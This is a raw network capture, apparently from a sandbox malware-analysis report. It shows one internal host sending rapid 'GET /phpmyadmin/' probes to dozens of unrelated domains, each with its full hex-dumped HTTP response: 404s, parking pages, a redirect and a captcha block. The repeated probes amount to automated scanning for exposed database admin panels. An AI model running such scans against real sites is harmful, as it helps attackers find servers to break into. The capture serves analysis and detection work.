65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 62 72 65 65 63 65 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 2e 7a 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at breecetechnology.co.za Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.6	56012	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.697994947 CET	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.865293026 CET	432	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:08 GMT server: Apache set-cookie: __tad=1708471568.8397850; expires=Fri, 17-Feb-2034 23:26:08 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 137 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 25 8e 41 12 c2 30 0c 03 cf f8 15 26 9c 43 78 80 9b 03 3f 71 db 94 16 02 e9 04 c3 d0 df e3 c6 3a 49 9e d1 5a 34 cb 33 47 00 9a 13 8f 11 48 16 c9 29 4e f5 cc 1f 0a 16 80 de 43 5d 56 41 d9 d6 d4 39 49 3f 09 77 fe b2 5d 9d 96 81 82 05 f3 86 52 d7 97 71 c3 fe 36 94 5c 6a e7 4e 53 93 c3 9d a0 f1 d2 a4 fd 03 1d bd c7 6b e6 d7 03 d1 7b 7d 18 f6 66 6c 2c 9b 07 7f 28 5c 82 ab a8 00 00 00 Data Ascii: %A0&Cx?q:IZ43GH)NC]VA9I?w]Rq6\jNSk{}fl,(\

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.6	56021	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.710441113 CET	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.891043901 CET	432	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:08 GMT server: Apache set-cookie: __tad=1708471568.5621840; expires=Fri, 17-Feb-2034 23:26:08 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 137 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 25 8e 41 12 c2 30 0c 03 cf f8 15 26 9c 43 78 80 9b 03 3f 71 db 94 16 02 e9 04 c3 d0 df e3 c6 3a 49 9e d1 5a 34 cb 33 47 00 9a 13 8f 11 48 16 c9 29 4e f5 cc 1f 0a 16 80 de 43 5d 56 41 d9 d6 d4 39 49 3f 09 77 fe b2 5d 9d 96 81 82 05 f3 86 52 d7 97 71 c3 fe 36 94 5c 6a e7 4e 53 93 c3 9d a0 f1 d2 a4 fd 03 1d bd c7 6b e6 d7 03 d1 7b 7d 18 f6 66 6c 2c 9b 07 7f 28 5c 82 ab a8 00 00 00 Data Ascii: %A0&Cx?q:IZ43GH)NC]VA9I?w]Rq6\jNSk{}fl,(\

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.6	55977	185.107.56.198	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.717936039 CET	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: att.com.ph Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.154664993 CET	924	IN	HTTP/1.1 200 OK accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile cache-control: max-age=0, private, must-revalidate connection: close content-length: 482 content-type: text/html; charset=utf-8 date: Tue, 20 Feb 2024 23:26:08 GMT server: nginx set-cookie: sid=6d2c4507-d047-11ee-b7c0-b2ef6d66f71c; path=/; domain=.att.com.ph; expires=Mon, 10 Mar 2092 02:40:16 GMT; max-age=2147483647; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 61 74 74 2e 63 6f 6d 2e 70 68 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 77 4f 44 51 33 4f 44 63 32 4f 43 77 69 61 57 46 30 49 6a 6f 78 4e 7a 41 34 4e 44 63 78 4e 54 59 34 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 58 46 79 59 6d 78 76 4e 6e 4e 73 62 32 64 74 4d 54 46 71 62 44 67 77 62 32 64 68 61 33 51 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 33 4d 44 67 30 4e 7a 45 31 4e 6a 67 73 49 6e 52 7a 49 6a 6f 78 4e 7a 41 34 4e 44 63 78 4e 54 59 34 4e 7a 6b 31 4d 54 63 78 66 51 2e 33 30 57 4f 56 49 76 7a 2d 39 67 6b 61 58 58 70 71 6a 63 67 47 4a 4e 39 76 6e 67 4b 55 58 69 53 38 53 53 57 73 2d 44 4e 48 53 67 26 73 69 64 3d 36 64 32 63 34 35 30 37 2d 64 30 34 37 2d 31 31 65 65 2d 62 37 63 30 2d 62 32 65 66 36 64 36 36 66 37 31 63 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://att.com.ph/phpmyadmin/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcwODQ3ODc2OCwiaWF0IjoxNzA4NDcxNTY4LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydXFyYmxvNnNsb2dtMTFqbDgwb2dha3QiLCJuYmYiOjE3MDg0NzE1NjgsInRzIjoxNzA4NDcxNTY4Nzk1MTcxfQ.30WOVIvz-9gkaXXpqjcgGJN9vngKUXiS8SSWs-DNHSg&sid=6d2c4507-d047-11ee-b7c0-b2ef6d66f71c');</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.6	56085	198.185.159.145	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.718739033 CET	175	OUT	GET /phpmyadmin/ HTTP/1.1 Host: publichouse.ie Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.811904907 CET	1276	IN	HTTP/1.1 404 Not Found Cache-Control: no-cache, must-revalidate Content-Length: 77562 Content-Type: text/html; charset=UTF-8 Date: Tue, 20 Feb 2024 23:26:08 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: oIAFe96U/MkF2Mc9j Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 Data Ascii: <!DOCTYPE html><head> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em; font-weight: 300; c
Feb 21, 2024 00:26:08.811913967 CET	1276	IN	Data Raw: 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 Data Ascii: olor: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family: 'Clarkson'; font-
Feb 21, 2024 00:26:08.811999083 CET	1276	IN	Data Raw: 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34 31 75 6f 5a 46 46 49 77 58 30 76 79 48 75 45 6a 48 59 48 32 56 6d 72 Data Ascii: LWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMttrEh8jq70i9RKy000O7s/J2
Feb 21, 2024 00:26:08.812032938 CET	268	IN	Data Raw: 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75 59 51 4c 64 5a 47 75 47 6a 75 6d 36 37 4f 36 76 73 34 70 7a 6e 4e 4e Data Ascii: xqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+rKdvVh6f1F0Y/zD8P1sa53N
Feb 21, 2024 00:26:08.812040091 CET	1276	IN	Data Raw: 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a 6d 6b 31 33 69 51 68 5a 70 56 76 77 57 61 65 4a 4a 76 5a 77 6d 5a 66 Data Ascii: 4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS5yocFv2WSejEdfhwp5nBV/y
Feb 21, 2024 00:26:08.812052011 CET	1276	IN	Data Raw: 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a 31 4b 74 35 6c 47 73 76 61 68 79 6a 4d 75 52 56 48 49 4e 4b 49 41 53 Data Ascii: b3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFIiJPGPnKHYK2JjCRhQbe7Dxt
Feb 21, 2024 00:26:08.812060118 CET	1276	IN	Data Raw: 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77 2f 4d 30 39 6b 66 67 47 63 66 7a 42 4f 77 72 79 52 61 56 44 73 36 44 Data Ascii: JIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2uE5F6+znJOlnPHleN2O10143
Feb 21, 2024 00:26:08.812093973 CET	1276	IN	Data Raw: 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79 78 47 4f 70 71 4a 4c 78 51 45 50 50 38 65 62 6b 68 32 78 6a 78 50 73 Data Ascii: ZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3jzHBrGuPR1YpMFFrB1bJ8us
Feb 21, 2024 00:26:08.812103033 CET	1276	IN	Data Raw: 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53 6d 38 78 79 37 34 61 37 52 49 71 32 52 79 68 4c 4c 71 34 76 45 4e 78 Data Ascii: KKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOYMOd3ZMy3lBovUZqA+G9Ip1V
Feb 21, 2024 00:26:08.812131882 CET	1276	IN	Data Raw: 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73 59 57 74 62 4f 4d 45 64 72 4b 62 50 65 78 6c 48 77 64 34 48 69 2f 67 Data Ascii: W9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBWNubh73czs77OmucVf3h6/Pn
Feb 21, 2024 00:26:08.902890921 CET	1276	IN	Data Raw: 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37 59 36 63 35 53 4e 6e 32 63 68 5a 4c 72 37 35 4d 79 53 4d 55 44 65 44 Data Ascii: /qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMfwYCj9K4ceU8KMt/MiGH+nwo

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.6	56029	91.136.8.144	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.750812054 CET	172	OUT	GET /phpmyadmin/ HTTP/1.1 Host: derbyron.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.925205946 CET	173	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:08 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 21 Connection: keep-alive Data Raw: 4e 6f 74 20 46 6f 75 6e 64 20 5b 43 46 4e 20 23 30 30 30 35 5d Data Ascii: Not Found [CFN #0005]

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.6	56028	81.169.145.143	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.764113903 CET	175	OUT	GET /phpmyadmin/ HTTP/1.1 Host: d-brinkmann.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.946099043 CET	355	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:08 GMT Server: Apache/2.4.58 (Unix) Content-Length: 196 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.6	56088	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.787858009 CET	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.953248978 CET	432	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:08 GMT server: Apache set-cookie: __tad=1708471568.5530616; expires=Fri, 17-Feb-2034 23:26:08 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 137 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 25 8e 41 12 c2 30 0c 03 cf f8 15 26 9c 43 78 80 9b 03 3f 71 db 94 16 02 e9 04 c3 d0 df e3 c6 3a 49 9e d1 5a 34 cb 33 47 00 9a 13 8f 11 48 16 c9 29 4e f5 cc 1f 0a 16 80 de 43 5d 56 41 d9 d6 d4 39 49 3f 09 77 fe b2 5d 9d 96 81 82 05 f3 86 52 d7 97 71 c3 fe 36 94 5c 6a e7 4e 53 93 c3 9d a0 f1 d2 a4 fd 03 1d bd c7 6b e6 d7 03 d1 7b 7d 18 f6 66 6c 2c 9b 07 7f 28 5c 82 ab a8 00 00 00 Data Ascii: %A0&Cx?q:IZ43GH)NC]VA9I?w]Rq6\jNSk{}fl,(\

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.6	56091	86.107.32.28	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.819503069 CET	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: collevilca.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.007582903 CET	1286	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: BitNinja Captcha Server Date: Tue, 20 Feb 2024 23:26:08 GMT Content-Length: 13695 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 